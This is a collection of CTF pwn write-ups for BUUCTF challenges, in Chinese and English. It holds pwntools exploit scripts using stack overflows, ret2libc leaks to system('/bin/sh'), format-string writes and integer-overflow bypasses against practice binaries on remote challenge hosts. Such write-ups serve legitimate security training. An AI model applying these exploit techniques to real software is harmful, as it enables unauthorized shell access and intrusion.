buuctf wp
try_your_nc
from pwn import *
from sys import *
debug=1
if debug:
p=remote("node3.buuoj.cn",26062)
else:
p=process("xxx")
p.interactive()
pwn1_sctf_2016
C++ 写的,害,输入I, 会转换为you,所以有溢出啊,还有后面函数
from pwn import *
from sys import *
debug=1
context.log_level='debug'
context.arch='amd64'
if debug:
p=process("./pwn1_sctf_2016")
else:
host = "node3.buuoj.cn"
port = 28912
p=remote(host, port)
door = 0x8048f0d
pay =20*"I"+"aaaa"+p32(door)
gdb.attach(p,"b *0x80491DE")
p.sendline(pay)
p.interactive()
ciscn_2019_n_1 浮点数查看
from pwn import *
from sys import *
debug=0
context.log_level='debug'
context.arch='amd64'
if debug:
p=process("./ciscn_2019_n_1")
else:
host = "node3.buuoj.cn"
port =29648
p=remote(host, port)
pay = p64(0)*4+p32(0)*3+p64(0x41348000)
#gdb.attach(p,"b *0x80491DE")
p.sendline(pay)
p.interactive()
ciscn_2019_c_1
泄露 打system 需要进行一个栈对齐,不能打onegadget
from pwn import *
from sys import *
debug=0
context.log_level='debug'
context.arch='amd64'
if debug:
p=process("./ciscn_2019_c_1")
else:
host = "node3.buuoj.cn"
port =25934
p=remote(host, port)
pop_rdi_t=0x400c83
put_got = 0x602020
put_plt = 0x4006E0
main= 0x400B28
pay = "a"*0x58 + p64(pop_rdi_t)+p64(put_got)+p64(put_plt)+p64(main)
#gdb.attach(p)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
put_add = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
base = put_add-0x0809c0
one = base + 0x4526a#0xf1147#0x45216#,0x4526a#0xf02a4#
print "put:"+hex(put_add)
print "base:"+hex(base)
str_bin = base+0x1b3e9a#0x18cd57
system = base + 0x04f440#0x045390
ret = 0x4006b9 # ubuntu 18 需要进行一个栈调试,因为在调用system的时候需要进行栈对齐
pay = "a"*0x58 +p64(ret)+ p64(pop_rdi_t)+p64(str_bin)+p64(system)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
p.interactive()
babyrop
这个题的关键在于绕过strncmp,strlen函数遇到‘\0’截断,但read 函数遇到‘\n’才截断,然后read函数有一个溢出可以把v5覆盖掉,v5 返回到main函数 ,可以控制另一个函数溢出。
nt __cdecl sub_804871F(int a1)
{
size_t v1; // eax
char s; // [esp+Ch] [ebp-4Ch]
char buf[7]; // [esp+2Ch] [ebp-2Ch]
unsigned __int8 v5; // [esp+33h] [ebp-25h]
ssize_t v6; // [esp+4Ch] [ebp-Ch]
memset(&s, 0, 0x20u);
memset(buf, 0, 0x20u);
sprintf(&s, "%ld", a1);
v6 = read(0, buf, 0x20u); // 溢出到v5
buf[v6 - 1] = 0;
v1 = strlen(buf); // 让strlen(buf) 为0
if ( strncmp(buf, &s, v1) ) // 读入到buf
exit(0);
write(1, "Correct\n", 8u);
return v5;
ssize_t __cdecl sub_80487D0(char a1) 这个a1 就是返回的V5了
{
ssize_t result; // eax
char buf; // [esp+11h] [ebp-E7h]
if ( a1 == '' )
result = read(0, &buf, 0xC8u);
else
result = read(0, &buf, a1); // 溢出
return result;
}
比较操蛋的是运程的 lib库,一定要远程去查。
from pwn import *
from sys import *
debug=0
context.log_level='debug'
context.arch='amd64'
if debug:
p=process("./babyrop")
else:
host = "node3.buuoj.cn"
port =27828
p=remote(host, port)
libc = ELF('./libc6_2.23-0ubuntu10_i386.so') #不是这个库,别瞎搞
#gdb.attach(p)
put_plt = 0x8048548
put_got = 0x8049FD4
main = 0x8048825
pay = "\x00"+"\xff"*8
p.sendline(pay)
p.recvuntil("Correct\n")
pay = 0xe7 *"a"+ "aaaa"+p32(put_plt)+p32(main)+p32(put_got)
p.sendline(pay)
put_add =u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
base = put_add -0x05f140# libc.symbols["puts"]#0x05fca0
print "put:"+hex(put_add)
print "base:"+hex(base)
pay = "\x00"+"\xff"*8
p.sendline(pay)
str_bin = base +0x15902b# libc.search("/bin/sh").next()#0x15ba0b
system = base + 0x03a940#libc.symbols["system"]#0x03ada0
one = base+0x5fbc6#0x5fbc5#0x3ac69#0x3ac62#0x3ac5e #0x3ac5c#
pay = 0xe7 *"a"+ "aaaa"+p32(system)+p32(0xbeeefff)+p32(str_bin)
#pay = 0xe7 *"a"+ "aaaa"+p32(one)
p.sendline(pay)
#input()
p.interactive()
ciscn_2019_en_2
和ciscn_2019_c_1 一模一样
from pwn import *
from sys import *
debug=0
context.log_level='debug'
context.arch='amd64'
if debug:
p=process("./ciscn_2019_en_2")
else:
host = "node3.buuoj.cn"
port =27611
p=remote(host, port)
pop_rdi_t=0x400c83
put_got = 0x602020
put_plt = 0x4006E0
main= 0x400B28
pay = "a"*0x58 + p64(pop_rdi_t)+p64(put_got)+p64(put_plt)+p64(main)
#gdb.attach(p)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
put_add = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
base = put_add-0x0809c0
one = base + 0x10a38c#0x4f322#0x4f2c5# 0x4526a#0xf1147#0x45216#,0x4526a#0xf02a4#
print "put:"+hex(put_add)
print "base:"+hex(base)
str_bin = base+0x1b3e9a#0x18cd57
system = base + 0x04f440#0x045390
ret = 0x4006b9 # ubuntu 18 zhan tiao zheng
pay = "a"*0x58 +p64(ret)+ p64(pop_rdi_t)+p64(str_bin)+p64(system)
#pay = "a"*0x58 +p64(ret)+ p64(one)
p.recvuntil("Input your choice!\n")
p.sendline(str(1))
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(pay)
p.interactive()
get_started_3dsctf_2016
溢出,后面函数,需要注意的是参数要传对,才能执行后门函数
void __cdecl get_flag(int a1, int a2)
{
int v2; // eax
int v3; // esi
unsigned __int8 v4; // al
int v5; // ecx
unsigned __int8 v6; // al
if ( a1 == 0x308CD64F && a2 == 0x195719D1 ) // 这里的 就是两个参数的值要传对啊,不对就废了
{
v2 = fopen("flag.txt", "rt");
v3 = v2;
v4 = getc(v2);
if ( v4 != '\xFF' )
{
v5 = (char)v4;
do
{
putchar(v5);
v6 = getc(v3);
v5 = (char)v6;
}
while ( v6 != 255 );
}
fclose(v3);
}
}
exp
#!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from sys import *
from struct import pack
debug=0
context.log_level='debug'
context.arch='i386'
if debug:
o=process("./get")
gdb.attach(o,"b *0x8048A3B")
else:
host = "node3.buuoj.cn"
port =26456
o=remote(host, port)
ret = 0x8048A40
flag = 0x80489A0
p = 'a'* 56+p32(ret)+p32(flag)+p32(0x804e6a0)+p32(0x308CD64F)+p32(0x195719D1)
o.sendline(p)
o.interactive()
PWN5
绕过if 条件,格式化字符串可写,修改unk_804C044内容即可
srand(v1);
fd = open("/dev/urandom", 0);
read(fd, &unk_804C044, 4u);
printf("your name:");
read(0, &buf, 0x63u);
printf("Hello,");
printf(&buf);
printf("your passwd:");
read(0, &nptr, 0xFu);
if ( atoi(&nptr) == unk_804C044 )
{
puts("ok!!");
system("/bin/sh");
}
这道题可以收获的是32位格式化写的时候,payload的构造
p32(add1)+p32(add2)+p32(add3)+"%10$hn%11$hn%12$hn" #hn是双字节写
如果是特定字符写的话,就要巧妙的构造了,比如
p32(add)+"%"+str(xxxxx)+"c%xx$hn"
p32(0x804C044)+p32(0x804C044+2)+"%10$hn" +"%11$hn" #hn是双字节写
#!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from sys import *
from struct import pack
debug=0
context.log_level='debug'
context.arch='i386'
if debug:
o=process("./pwn5")
gdb.attach(o,"b *0x080492A6")
else:
host = "node3.buuoj.cn"
port =28330
o=remote(host, port)
pay = p32(0x804C044)+p32(0x804C044+2)+"%10$hn" +"%11$hn" #hn是双字节写
o.sendlineafter("your name:",pay)
pa = p32(0x80008)
o.sendlineafter("your passwd:","524296")
o.interactive()
r2t3
这 tm 有后门函数 我没看到。。。wc
整数溢出 其实很简单,但是我竟然搞了很久。。wotm 我太菜了
from pwn import *
from sys import *
from struct import pack
debug=0
context.log_level='debug'
context.arch='i386'
libc = ELF('./libc-2.29.so')
if debug:
o=process("./r2t3")
gdb.attach(o,"b *0x8048615")
else:
host = "node3.buuoj.cn"
port =27787
o=remote(host, port)
pay = 'a'*17+'aaaa'+p32(0x804858B)+p32(0x804858B)+p32(0x804858B)*58
o.sendlineafter("your name:\n",pay)
o.interactive()
绕过strlen 检查 ,strlen返回值存在eax 但用的只有al
.text:080485E1 call _strlen
.text:080485E6 add esp, 10h
.text:080485E9 mov [ebp+var_9], al
ciscn_2019_n_8
__isoc99_scanf("%s", var, v4, v5);
if ( *(_QWORD *)&var[13] )
{
if ( *(_QWORD *)&var[13] == 0x11LL )
system("/bin/sh");
#!/usr/bin/env python2
# execve generated by ROPgadget
from pwn import *
from sys import *
from struct import pack
debug=0
context.log_level='debug'
context.arch='i386'
if debug:
o=process("./ciscn_2019_n_8")
gdb.attach(o)
else:
host = "node3.buuoj.cn"
port =26224
o=remote(host, port)
pay = p32(0x11)*14
o.sendlineafter("What's your name?",pay)
o.interactive()